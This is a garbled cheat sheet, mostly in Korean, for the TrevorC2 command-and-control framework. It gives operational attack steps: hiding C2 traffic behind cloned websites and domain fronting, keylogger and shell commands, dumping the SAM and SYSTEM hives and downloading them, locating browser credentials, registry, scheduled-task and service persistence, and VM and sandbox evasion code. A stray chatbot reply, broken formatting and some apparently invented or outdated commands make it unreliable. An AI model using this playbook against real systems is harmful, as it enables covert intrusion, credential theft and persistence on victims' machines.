TrevorC2 프레임워크 치트 시트
개요
TrevorC2는 은밀한 명령 실행을 위해 클라이언트/서버 통신을 터널링하는 합법적인 웹사이트입니다. TrustedSec에서 개발한 이 도구는 합법적인 웹사이트를 명령 및 제어 통신의 전면으로 사용하여, 트래픽이 일반적인 웹 브라우징으로 보이기 때문에 탐지가 매우 어렵습니다.
⚠️ 경고: 이 도구는 승인된 침투 테스트 및 레드팀 연습용으로만 의도되었습니다. 모든 환경에서 사용하기 전에 적절한 승인을 받았는지 확인하세요.
(The rest of the sections will remain as placeholders until the full content is provided)
Would you like me to continue with the remaining sections, or do you want to provide the content for the other sections first?```bash
Clone the repository
git clone https://github.com/trustedsec/trevorc2.git cd trevorc2
Install Python dependencies
pip3 install -r requirements.txt
### Manual Setup
```bash
# Download latest release
wget https://github.com/trustedsec/trevorc2/archive/master.zip
unzip master.zip
cd trevorc2-master
# Install dependencies
pip3 install pycrypto requestsDocker Installation
# Build Docker container
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2
docker build -t trevorc2 .
# Run container
docker run -it -p 443:443 trevorc2Basic Usage
Server Setup
# Start TrevorC2 server
python3 trevorc2_server.py
# Start server with custom configuration
python3 trevorc2_server.py --config custom_config.py
# Start server on specific port
python3 trevorc2_server.py --port 8080Client Deployment
# Generate client
python3 trevorc2_client.py
# Generate client with custom server
python3 trevorc2_client.py --server https://example.com
# Generate PowerShell client
python3 trevorc2_client.py --powershellCommand Reference
Server Commands
| 명령어 | 설명 |
|---|---|
help | 도움말 메뉴 표시 |
list | 활성 에이전트 목록 |
interact <id> | 에이전트와 상호작용하기 |
kill <id> | 특정 에이전트 제거 |
killall | 모든 요원들을 제거하라 |
exit | 서버 종료 |
Agent Interaction
| 명령어 | 설명 |
|---|---|
shell <command> | 셸 명령 실행 |
upload <local> <remote> | 에이전트에 파일 업로드 |
download <remote> <local> | 에이전트에서 파일 다운로드 |
screenshot | 스크린샷 찍기 |
keylogger start | 키로거 시작 |
keylogger stop | 키로거 중지 |
keylogger dump | 키로거 데이터 덤프 |
persistence | 지속성 설치 |
migrate <pid> | 프로세스로 마이그레이션 |
back | 백그라운드 에이전트 |
Configuration
Server Configuration
# config.py
BIND_PORT = 443
HOSTNAME = "0.0.0.0"
WEBSITE_FOLDER = "site/"
CERT_FILE = "server.pem"
# Encryption settings
CIPHER_TYPE = "AES"
HASH_TYPE = "SHA256"
# Communication settings
BEACON_INTERVAL = 10
JITTER = 0.2
# Logging
LOG_FILE = "trevorc2.log"
DEBUG = FalseClient Configuration
# Client settings
SERVER_URL = "https://example.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SLEEP_TIME = 10
JITTER = 0.2
# Persistence settings
PERSISTENCE_METHOD = "registry"
PERSISTENCE_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"Advanced Features
Website Masquerading
# Set up legitimate website front
mkdir site
cp -r /var/www/html/* site/
# Use custom website
python3 trevorc2_server.py --site /path/to/website
# Clone existing website
wget -r -p -k https://example.com
python3 trevorc2_server.py --site example.com/SSL/TLS Configuration
# Generate self-signed certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Use custom certificate
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem
# Let's Encrypt certificate
certbot certonly --standalone -d yourdomain.com
python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pemDomain Fronting
# Configure domain fronting
FRONT_DOMAIN = "cdn.example.com"
HOST_HEADER = "legitimate-site.com"
# Client configuration for domain fronting
client_config = \\\\{
'server_url': 'https://cdn.example.com',
'host_header': 'legitimate-site.com',
'sni': 'cdn.example.com'
\\\\}Client Generation
Windows Client
# Generate Windows executable
python3 trevorc2_client.py --windows --output client.exe
# Generate PowerShell client
python3 trevorc2_client.py --powershell --output client.ps1
# Generate batch file client
python3 trevorc2_client.py --batch --output client.batLinux Client
# Generate Linux binary
python3 trevorc2_client.py --linux --output client
# Generate Python client
python3 trevorc2_client.py --python --output client.py
# Generate shell script client
python3 trevorc2_client.py --shell --output client.shmacOS Client
# Generate macOS binary
python3 trevorc2_client.py --macos --output client
# Generate AppleScript client
python3 trevorc2_client.py --applescript --output client.scptEvasion Techniques
Traffic Obfuscation
# Custom User-Agent strings
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
]
# Random beacon intervals
import random
SLEEP_TIME = random.randint(5, 15)Payload Encoding
# Base64 encode payload
echo "payload"|base64
# XOR encode payload
python3 -c "
import sys
key = 0xAA
payload = sys.argv[1]
encoded = ''.join([chr(ord(c) ^ key) for c in payload])
print(encoded.encode('hex'))
" "your_payload"Anti-Analysis
# VM detection
import subprocess
def check_vm():
vm_indicators = ['VMware', 'VirtualBox', 'QEMU']
try:
output = subprocess.check_output('systeminfo', shell=True)
for indicator in vm_indicators:
if indicator in output.decode():
return True
except:
pass
return False
# Sandbox evasion
import time
def sandbox_evasion():
time.sleep(60) # Sleep to avoid sandbox analysis
# Check for mouse movement, user activity, etc.Post-Exploitation
Information Gathering
# System information
shell systeminfo
shell whoami /all
shell net user
shell net group
# Network information
shell ipconfig /all
shell netstat -an
shell arp -a
shell route print
```### 자격 증명 수집
```bash
# Dump SAM database
shell reg save HKLM\SAM sam.hiv
shell reg save HKLM\SYSTEM system.hiv
download sam.hiv
download system.hiv
# Browser credentials
shell dir "%APPDATA%\Mozilla\Firefox\Profiles"
shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"
# Saved passwords
shell cmdkey /list
```### 측면 이동
```bash
# Network discovery
shell net view
shell ping -n 1 192.168.1.1-254
# Share enumeration
shell net view \\target-computer
shell dir \\target-computer\c$
# Service enumeration
shell sc query
shell tasklist /svc
```### 지속성 메커니즘
```bash
# Registry persistence
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"
# Scheduled task
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon
# Service persistence
shell sc create "UpdateService" binpath= "C:\temp\client.exe"
shell sc config "UpdateService" start= auto
```## 운영 보안
```python
# Encrypted communications
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
def encrypt_data(data, key):
cipher = AES.new(key, AES.MODE_GCM)
ciphertext, tag = cipher.encrypt_and_digest(data.encode())
return cipher.nonce + tag + ciphertext
# Certificate pinning
import ssl
def verify_certificate(hostname, cert_path):
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cert_path)
```### 통신 보안
```bash
# Rotate infrastructure regularly
# Use different domains and IPs
# Implement proper logging and monitoring
# Use legitimate certificates
# Vary communication patterns
```### 운영 절차
```bash
# Check server status
netstat -tlnp|grep :443
# Test connectivity
curl -k https://your-server.com
# Check firewall rules
iptables -L
ufw status
```## 문제 해결
```bash
# Debug client connection
# Add debug prints to client code
print("Connecting to server...")
print(f"Response: \\\\{response.status_code\\\\}")
# Check DNS resolution
nslookup your-server.com
dig your-server.com
```### 연결 문제
```bash
# Verify certificate
openssl x509 -in server.pem -text -noout
# Test SSL connection
openssl s_client -connect your-server.com:443
# Check certificate chain
curl -vI https://your-server.com
```### 클라이언트 문제
https://github.com/trustedsec/trevorc2##
# 인증서 문제
https://www.trustedsec.com/blog/#
# 탐지 회피
https://github.com/trustedsec/trevorc2/wiki##
# 네트워크 수준
- 합법적인 도메인 및 인증서 사용
- 도메인 프론팅 구현
- 통신 간격 변경
- 일반 포트 사용 (80, 443)
- 합법적인 트래픽 패턴 모방
https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/##
# 호스트 수준
- 일반적인 IOC 방지
- 합법적인 프로세스 이름 사용
- 안티-VM 기술 구현
- 파일리스 실행
- 페이로드 및 통신 암호화